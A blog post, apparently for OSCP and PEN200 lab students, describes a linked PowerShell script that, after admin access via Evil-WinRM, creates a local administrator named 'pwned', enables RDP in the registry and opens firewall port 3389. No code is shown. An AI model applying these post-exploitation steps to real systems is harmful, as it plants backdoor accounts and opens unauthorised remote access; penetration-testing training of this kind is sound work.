From Evil-WinRM to Full RDP Access

Ever been stuck in an Evil-WinRM session with limited command execution, even after gaining admin privileges — using tools like GodPotato? I’ve been there, and it’s frustrating. If you are about to take the OSCP exam or working on the PEN200 Challenge Labs, a restrictive CLI environment can slow you down. That’s why I wrote this PowerShell script to automate enabling Remote Desktop Protocol (RDP) access, giving you a full Windows GUI to make your tasks faster and easier.

Uploading the script is very easy. Evil-Winrm already has an “upload” command. Just make sure you are on same folder (Kali) where the script is. Raj Chandel has an excellent Tutorial about Evil-Winrm, including how to upload files. His whole site is fantastic. So I suggest looking at other PenTesting articles as well.

🔑 What Does the Script Do?

This script automates the setup of RDP access by:

1. Creating a Local Admin User: Automatically creates a user named pwned with a predefined password.
2. Adding the User to Administrators Group: Ensures pwned has full administrative privileges.
3. Enabling Remote Desktop: Modifies registry keys to allow RDP connections.
4. Configuring Firewall Rules: Opens the necessary port (3389) for inbound RDP traffic.

💡 Why Use This Script?

• Optimized for OSCP: During the OSCP exam, you have limited time to escalate privileges, enumerate targets, and achieve objectives. GUI access via RDP speeds up tasks like local enumeration and command execution.
• Overcomes Evil-WinRM Limitations: Evil-WinRM sessions often have restrictions, even after privilege escalation. With this script, you can unlock the full potential of your access.
• Saves Time: No need to manually tweak settings or troubleshoot command execution issues, like running Mimikatz. Once connected via RDP, all commands will work, assuming you have the right permissions.

The script can be found at my GitHub page: 👉 RDP Automation Script . It is only intended for #OSCP exam or PEN200 Challenge Labs tough, so please keep that in mind. Running this on a real engagement can be very disruptive.

If you found this helpful, I invite you to subscribe to my Medium page for more in-depth articles, pentesting tips, and exclusive scripts tailored for ethical hacking and certification prep. 🚀

This script has been tested on Windows 10 — your feedback and suggestions are always welcome. Enjoy!